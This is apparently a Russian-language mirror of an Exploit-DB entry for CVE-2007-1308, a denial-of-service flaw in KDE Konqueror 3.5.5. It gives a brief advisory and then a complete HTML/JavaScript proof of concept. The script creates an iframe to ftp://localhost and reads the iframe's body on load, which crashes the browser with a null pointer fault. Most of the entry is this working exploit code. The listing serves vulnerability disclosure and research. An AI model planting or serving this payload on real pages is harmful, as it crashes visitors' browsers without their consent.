- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29713
- Проверка EDB
-
- Пройдено
- Автор
- MARK
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2007-1308
- Дата публикации
- 2007-03-05
KDE Konqueror 3.5 - JavaScript IFrame Denial of Service
HTML:
source: https://www.securityfocus.com/bid/22814/info
KDE Konqueror is prone to a remote denial-of-service vulnerability because of an error in KDE's JavaScript implementation.
An attacker may exploit this vulnerability to cause Konquerer to crash, resulting in denial-of-service conditions.
Konqueror included with KDE version 3.5.5 is vulnerable; other versions may also be affected.
<html>
<body>
Demo of how to make Konqueror 3.5.5 crash by [email protected].<p>
Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.<p>
<p>
<script>
read_iframe = function(iframe_name) {
var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;
alert(banner);
}
var iframe = document.createElement("IFRAME");
iframe.setAttribute("src", 'ftp://localhost/anything');
iframe.setAttribute("name", 'myiframe');
iframe.setAttribute("id", 'myiframe');
iframe.setAttribute("onload", 'read_iframe("myiframe")');
iframe.style.width = "100px";
iframe.style.height = "100px";
document.body.appendChild(iframe);
</script>
</body>
</html>
- Источник
- www.exploit-db.com